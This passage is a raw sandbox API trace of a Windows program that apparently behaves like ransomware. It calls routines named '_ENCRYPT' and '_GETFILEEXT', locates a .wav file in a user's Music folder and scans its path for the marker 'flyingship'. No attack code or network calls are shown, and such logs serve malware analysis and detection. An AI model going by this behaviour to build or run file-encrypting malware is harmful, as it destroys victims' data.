(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0182.614] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0182.614] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.615] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.615] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0182.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0182.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.616] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0182.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0182.616] CloseHandle (hObject=0x138) returned 1 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.616] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.616] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0182.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.617] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0182.617] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.617] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.618] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.618] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0182.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0182.618] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0182.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0182.618] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0182.618] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0182.619] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.619] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0182.619] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0182.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0182.619] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0182.619] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.619] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0182.620] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.620] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0182.620] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0182.620] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0xfe7dc3e0, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 0x90add8 [0182.621] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.622] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbda6fa30, ftCreationTime.dwHighDateTime=0x1d5df8c, ftLastAccessTime.dwLowDateTime=0xfe7dc3e0, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0xfe7dc3e0, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xa854, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="7iHROd3G.wav", cAlternateFileName="")) returned 0x90add8 [0182.622] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0182.622] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0182.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.622] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0182.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 